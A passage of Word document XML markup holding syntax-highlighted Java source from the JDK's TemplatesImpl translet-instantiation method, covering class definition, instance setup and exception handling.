          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>defineTransletClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE00770"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p>
    <w:p w14:paraId="7F8A4580"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// The translet needs to keep a reference to all its auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76993C67"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>// class to prevent the GC from collecting them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF33D3"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>AbstractTranslet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> = (AbstractTranslet) </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>_class</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>[_transletIndex].</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>newInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6421F6"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>postInitialization</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F779B08"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>setTemplates</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A835262"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>setOverrideDefaultParser</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(_overrideDefaultParser);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC303A"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>setAllowedProtocols</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(_accessExternalStylesheet);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2E481"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (_auxClasses != </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709514FB"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>translet</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>setAuxiliaryClasses</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(_auxClasses);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2252E596"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E5D78"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p>
    <w:p w14:paraId="3094A45A"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> translet;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5171EFC7"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B089264"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>InstantiationException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E4CBCA"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>ErrorMsg</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TRANSLET_OBJECT_ERR</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>, _name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6AC679"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>TransformerConfigurationException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>err</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CCB60"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A22FD49"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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="C586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t> (</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>IllegalAccessException</w:t>
      </w:r>
      <w:r w:rsidRPr="003658AD">
        <w:rPr>
